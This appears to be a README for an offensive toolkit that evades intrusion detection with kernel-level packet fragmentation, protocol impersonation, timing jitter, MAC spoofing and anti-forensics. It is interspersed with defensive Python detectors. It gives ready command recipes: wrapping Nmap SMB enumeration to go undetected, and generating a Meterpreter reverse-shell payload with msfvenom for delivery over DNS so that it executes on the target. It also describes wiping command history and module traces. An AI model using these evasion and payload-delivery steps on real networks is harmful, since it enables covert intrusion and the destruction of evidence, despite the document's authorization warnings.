Flea Flicker NetFilter: Network Evasion Toolkit

Network Evasion for Red Teams

IDS blocks your scans. ML detects your payloads. Behavioral analysis flags your timing.

Your pentest is over before it starts.

Flea Flicker manipulates packets at kernel level. Before they hit the network. Before IDS sees them.

Netfilter hooks. Fragment payloads. Randomize timing. Impersonate protocols. Traffic looks legitimate. IDS sees nothing suspicious.

Manual control over packet behavior. Not automated evasion. Not script kiddie tools.

What It Does

Deep Packet Inspection Evasion

IDS reads packet contents. Pattern matching catches exploits. Signature detection blocks payloads.

Flea Flicker fragments your attack across multiple packets:

  • Fragment payloads across multiple packets
  • Encrypt at application layer before network layer
  • Insert random padding between fragments
  • Reassemble only at destination

Example:

Normal Metasploit payload:
[TCP Header][Exploit Code]
↓ IDS sees exploit signature, blocks

Flea Flicker:
[TCP Header][Fragment 1 + Padding]
[TCP Header][Fragment 2 + Padding]
[TCP Header][Fragment 3 + Padding]
↓ IDS sees incomplete fragments, allows
↓ Target reassembles into exploit
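From the detection side, the split shown above is exactly what stream reassembly exists to undo. The Python below is an added example, not Flea Flicker code: it compares a per-packet signature match with one run over the reassembled TCP stream, using constructed segments and a placeholder signature.

```python
# Added example (not part of the Flea Flicker project): a detector that matches
# signatures per packet misses a payload split across TCP segments; reassembling
# the stream first, as the receiving host does, restores the match.
from dataclasses import dataclass
from typing import List

# Constructed placeholder signature; a real IDS rule would carry exploit bytes.
SIGNATURE = b"EXPLOIT-MARKER"

@dataclass
class Segment:
    seq: int        # TCP sequence number of the first payload byte
    payload: bytes

def per_packet_match(segments: List[Segment], signature: bytes = SIGNATURE) -> bool:
    """Naive detector: inspects each segment in isolation."""
    return any(signature in s.payload for s in segments)

def reassemble(segments: List[Segment]) -> bytes:
    """Rebuild the byte stream the receiver sees: order by sequence number and
    keep only the new bytes of any overlapping (retransmitted) segment."""
    stream = bytearray()
    base = min(s.seq for s in segments)
    for s in sorted(segments, key=lambda seg: seg.seq):
        offset = s.seq - base
        if offset < len(stream):                 # overlap: drop bytes already seen
            stream.extend(s.payload[len(stream) - offset:])
        else:                                    # gap: a real reassembler would wait;
            stream.extend(b"\x00" * (offset - len(stream)))  # zero-fill keeps offsets
            stream.extend(s.payload)
    return bytes(stream)

def stream_match(segments: List[Segment], signature: bytes = SIGNATURE) -> bool:
    """Stream-aware detector: match against the reassembled payload."""
    return signature in reassemble(segments)

# Constructed traffic: the marker split across out-of-order segments, plus a
# retransmission that overlaps its neighbours.
FRAGMENTED = [
    Segment(seq=1013, payload=b"MARKER trailing bytes"),
    Segment(seq=1000, payload=b"GET /EXP"),
    Segment(seq=1008, payload=b"LOIT-"),
    Segment(seq=1008, payload=b"LOIT-MARK"),  # retransmitted with extra bytes
]

if __name__ == "__main__":
    print("per-packet:", per_packet_match(FRAGMENTED))  # False
    print("stream    :", stream_match(FRAGMENTED))      # True
```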

Protocol Impersonation

Unusual protocols get flagged. Port scans detected immediately.

Make attack traffic look like legitimate services:

Example:

Nmap scan on port 445:
→ SMB enumeration detected, blocked

Flea Flicker-wrapped Nmap:
→ Packets look like HTTPS traffic on 443
→ Payload hidden in TLS-like structure
→ IDS sees "normal web browsing"
→ Scan proceeds undetected
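A defender's counter to port-based assumptions is to check that the bytes on 443 actually obey TLS framing. The Python below is an added example (not part of the project): it validates the record header and ClientHello header lengths on constructed inputs, so a "TLS-like structure" whose lengths disagree is flagged regardless of port.

```python
# Added example (not Flea Flicker code): a port-independent check that the first
# bytes a client sends really are a TLS ClientHello. Traffic that is merely
# "TLS-like" passes a port filter but fails the length consistency checks below.
from typing import Optional

TLS_HANDSHAKE = 0x16
CLIENT_HELLO = 0x01
TLS_VERSIONS = {0x0301, 0x0302, 0x0303}   # record-layer versions used by TLS 1.0-1.3

def tls_client_hello_problem(data: bytes) -> Optional[str]:
    """Return None if `data` starts with a well-framed TLS ClientHello,
    otherwise a short reason a detection rule could log."""
    if len(data) < 9:
        return "too short for a TLS record + handshake header"
    if data[0] != TLS_HANDSHAKE:
        return f"record type 0x{data[0]:02x} is not handshake"
    version = int.from_bytes(data[1:3], "big")
    if version not in TLS_VERSIONS:
        return f"record version 0x{version:04x} is not TLS"
    record_len = int.from_bytes(data[3:5], "big")
    if data[5] != CLIENT_HELLO:
        return f"handshake type 0x{data[5]:02x} is not ClientHello"
    hs_len = int.from_bytes(data[6:9], "big")
    if hs_len + 4 != record_len:               # handshake header is 4 bytes
        return f"handshake length {hs_len} disagrees with record length {record_len}"
    if len(data) < 5 + record_len:
        return "record truncated"
    return None

def wrap_client_hello(body: bytes) -> bytes:
    """Frame `body` as a ClientHello inside a TLS 1.0 record (constructed helper)."""
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE, 0x03, 0x01]) + len(handshake).to_bytes(2, "big") + handshake

# Constructed samples: a minimal ClientHello body (client version 1.2, 32-byte
# random, empty session id, one cipher suite, null compression) and a blob that
# starts like TLS but whose lengths do not agree.
REAL_HELLO = wrap_client_hello(
    b"\x03\x03" + b"\x11" * 32 + b"\x00" + b"\x00\x02\x13\x01" + b"\x01\x00"
)
TLS_LIKE = b"\x16\x03\x03\x00\x40" + b"\x01\x00\x00\x10" + b"scan bytes here..."

if __name__ == "__main__":
    print("real:", tls_client_hello_problem(REAL_HELLO))   # None
    print("fake:", tls_client_hello_problem(TLS_LIKE))
```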

Timing Randomization

Behavioral analysis detects patterns. Regular intervals = automated scanning. You get caught.

Randomize everything:

  • Random delays between packets (0.1s - 5s)
  • Jitter injection (mimics human interaction)
  • Volume throttling (stays under threshold)

What it defeats:

  • Time-series analysis (looks for patterns)
  • Rate limiting (stays under trigger threshold)
  • Correlation engines (breaks temporal clustering)
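Inter-arrival timing is not the only behavioral signal a blue team has. As an added example (not project code), the Python below counts distinct destinations per source over a long window, a check that is indifferent to how the gaps between probes are randomized; the event sample is constructed.

```python
# Added example (not Flea Flicker code): a fan-out counter that ignores packet
# timing entirely. Jitter and throttling defeat inter-arrival analysis, but a
# sweep still has to touch many distinct destinations; counting those over a
# long window catches it however the gaps are randomized.
import random
from collections import defaultdict, deque
from typing import Deque, Dict, List, Set, Tuple

Event = Tuple[float, str, str, int]   # (timestamp, src_ip, dst_ip, dst_port)
Target = Tuple[str, int]

class FanOutDetector:
    def __init__(self, window_s: float, threshold: int):
        self.window_s = window_s
        self.threshold = threshold
        self._seen: Dict[str, Deque[Tuple[float, Target]]] = defaultdict(deque)

    def observe(self, ts: float, src: str, dst: str, port: int) -> bool:
        """Record one connection attempt (timestamps fed in order); return True
        when `src` has touched >= threshold distinct (dst, port) in the window."""
        q = self._seen[src]
        q.append((ts, (dst, port)))
        while q and ts - q[0][0] > self.window_s:   # expire old attempts
            q.popleft()
        return len({target for _, target in q}) >= self.threshold

def alerts_for(events: List[Event], window_s: float = 1800.0, threshold: int = 20) -> Set[str]:
    """Replay a batch of events in time order; return the sources that alerted."""
    det = FanOutDetector(window_s, threshold)
    return {src for ts, src, dst, port in sorted(events) if det.observe(ts, src, dst, port)}

def jittered_scan(src: str, hosts: int, seed: int = 7) -> List[Event]:
    """Constructed slow SMB sweep: one host per probe, random 0.1-5 s gaps."""
    rng = random.Random(seed)       # fixed seed keeps the sample reproducible
    ts, out = 0.0, []
    for i in range(hosts):
        ts += rng.uniform(0.1, 5.0)
        out.append((ts, src, f"10.0.0.{i + 1}", 445))
    return out

# Constructed traffic: a 40-host jittered sweep plus a user who re-visits one
# HTTPS server; the sweep alerts, the user does not.
SAMPLE = jittered_scan("10.0.0.50", 40) + [
    (t, "10.0.0.77", "10.0.0.9", 443) for t in (1.0, 35.0, 70.0, 300.0)
]

if __name__ == "__main__":
    print(alerts_for(SAMPLE))   # {'10.0.0.50'}
```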

MAC Address Rotation

Network access control. MAC filtering. Device tracking. They know your hardware.

Rotate and spoof:

  • Rotate MAC every N packets
  • Spoof vendor OUI (looks like different hardware)
  • Maintain DHCP lease across rotations

Use case: Bypass MAC filtering on WiFi networks during a pentest.

Traffic Mimicry

Volume analysis spots anomalies. Attack traffic doesn't look like normal users. You stand out.

Hide in normal traffic:

  • Generate decoy traffic (legitimate-looking)
  • Match volume patterns (office hours, usage spikes)
  • Protocol diversity (HTTP, DNS, SMTP mixed)

Result: Real attack hidden in noise that looks like a normal user.

Technical Implementation

Netfilter hooks (Linux kernel):

// Hook callback: runs for every outbound IPv4 packet after routing
// (headers: <linux/netfilter.h>, <linux/netfilter_ipv4.h>, <linux/skbuff.h>)
static unsigned int packet_handler(void *priv, struct sk_buff *skb,
                                   const struct nf_hook_state *state)
{
    // Fragment payload
    // Add encryption layer
    // Inject timing delays
    // Spoof headers
    return NF_ACCEPT; // Send modified packet
}

// Hook descriptor: IPv4, post-routing, highest priority
static struct nf_hook_ops nfho_out = {
    .hook     = packet_handler,
    .pf       = PF_INET,
    .hooknum  = NF_INET_POST_ROUTING,
    .priority = NF_IP_PRI_FIRST,
};

// Intercept outbound packets: register in module init (the 4.13+ API takes a
// network namespace); pair with nf_unregister_net_hook(&init_net, &nfho_out) in module exit
nf_register_net_hook(&init_net, &nfho_out);

Architecture:

[Application] → [Payload]
      ↓
[Flea Flicker Interceptor]
      ↓
[Fragment + Encrypt + Obfuscate + Time Delay]
      ↓
[Modified Packets] → [Network]

Real-World Scenario

Objective: Enumerate SMB shares on corporate network with IDS deployed.

Without Flea Flicker:

$ nmap -p 445 --script smb-enum-shares 10.0.0.0/24
→ IDS detects: Port scan + SMB enumeration
→ Alert triggered
→ IP blocked
→ Pentest detected

With Flea Flicker:

$ flea-flicker --mode ghost --protocol https \
  nmap -p 445 --script smb-enum-shares 10.0.0.0/24

→ Packets fragmented across a 20-second window
→ Traffic appears as HTTPS on port 443
→ Timing randomized (looks like browsing)
→ IDS sees: Normal web traffic
→ Scan completes undetected
→ Pentest proceeds

Pentest Integration

Metasploit payload wrapping:

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin

# Wrap with Flea Flicker
flea-flicker --wrap payload.bin \
  --protocol dns --fragment-size 64 --delay 0.5-3.0

# Deliver wrapped payload
# Target receives fragments over DNS
# IDS sees legitimate DNS queries
# Payload reassembles and executes

Burp Suite extension:

[Burp Repeater]
     ↓
[Flea Flicker Proxy]
     ↓
[Obfuscated HTTP requests]
     ↓
[Target Web App]

WAF sees fragmented, time-delayed requests
Attack succeeds where the direct request was blocked

Nmap evasion:

# Standard aggressive scan (detected immediately)
nmap -A -T4 target.com

# Flea Flicker wrapped (evades detection)
flea-flicker --mode shadow --timing random \
  nmap -A -T2 target.com

Installation

# Clone repository
git clone https://github.com/ghostintheprompt/flea-flicker-netfilter
cd flea-flicker-netfilter

# Install dependencies (requires root for netfilter)
sudo ./install.sh

# Load kernel module
sudo modprobe flea_flicker

# Verify installation
flea-flicker --version

Requirements:

  • Linux kernel 4.15+ (netfilter support)
  • Root access (kernel module loading)
  • Python 3.8+ (control scripts)
  • Compatible with: Kali, ParrotOS, Ubuntu, Debian

Basic Usage

Ghost Mode (DPI evasion):

# Wrap any command
flea-flicker --mode ghost [command]

# Example: Evade IDS during Nmap scan
flea-flicker --mode ghost nmap -A target.com

Shadow Mode (MAC rotation + traffic mimicry):

# Enable on interface
flea-flicker --mode shadow --interface wlan0

# Continuous MAC rotation every 100 packets
# Generates decoy traffic automatically

Protocol Impersonation:

# Make traffic look like HTTPS
flea-flicker --protocol https nmap -p 445 target.com

# Make traffic look like DNS
flea-flicker --protocol dns [command]

Custom Configuration:

# Fine-grained control
flea-flicker --fragment-size 64 \
  --delay 0.5-3.0 \
  --protocol https \
  --mac-rotation 100 \
  [command]

Operational Security

Memory-only operation:

  • No logs written by default
  • Configuration in RAM
  • Minimal disk artifacts

Clean shutdown:

# Graceful cleanup
flea-flicker --cleanup

# Emergency kill
flea-flicker --emergency-shutdown

# Self-destruct timer (cleanup after N minutes)
flea-flicker --self-destruct 60 [command]

Anti-forensics:

  • Clears command history entries
  • Wipes kernel module traces
  • Removes temporary files
  • Resets network state

When To Use This

Authorized pentests. Client network has real defenses. You need to test evasion capabilities. Written permission in hand.

Red team exercises. Blue team deployed IDS/IPS. They think they're safe. Prove them wrong.

Security research. Testing detection algorithms. Building better defenses. Understanding attacker techniques.

Defense development. Blue team needs to know these attacks exist. Build signatures. Improve detection.

Don't Be Stupid

Unauthorized networks = federal prison. CFAA violation. Real consequences.

No written authorization = don't use this tool. Period.

Critical infrastructure, employer networks, school networks without explicit permission = extra illegal.

This is for red teams testing defenses. Not for criminals.

You need: Written authorization. Defined scope. Professional pentest engagement or research environment.

Don't be the person who learns CFAA definitions in federal court.

Why This Exists

Built this after a pentest where the client deployed an ML-based IDS. Standard Nmap = instant detection. Metasploit payloads = blocked immediately. Needed packet manipulation before the IDS could analyze anything.

Netfilter hooks at kernel level. Intercept outbound traffic. Fragment payloads. Randomize timing. Impersonate protocols. IDS sees fragmented, delayed traffic that looks legitimate.

Works against: Commercial IDS/IPS, behavioral analysis, signature detection, timing correlation.

Doesn't work against: Deep SSL inspection with client certs, nation-state detection (they analyze everything), air-gapped networks (obviously).

The technique: Understand how each detection method works. Evade systematically. DPI reads content = fragment it. Timing analysis looks for patterns = randomize them. Protocol detection flags unusual traffic = impersonate legitimate services. Behavioral analysis models normal users = generate decoy traffic that matches.

For Red Teams

This gets past commercial defenses. Test in lab first. Understand the evasion techniques. Don't rely on automation.

Manual control over packet behavior. You decide fragmentation size, timing delays, protocol impersonation. Tool provides capability. You provide intelligence.

For Blue Teams

Learn these techniques. Attackers use them. Update your signatures. Behavioral analysis alone isn't enough. Need multi-layer detection: content + timing + volume + protocol analysis.

If red team can evade your IDS with open-source tools, real attackers already are.


Open source. Authorized use only. Federal prison is real.


github.com/ghostintheprompt/flea-flicker-netfilter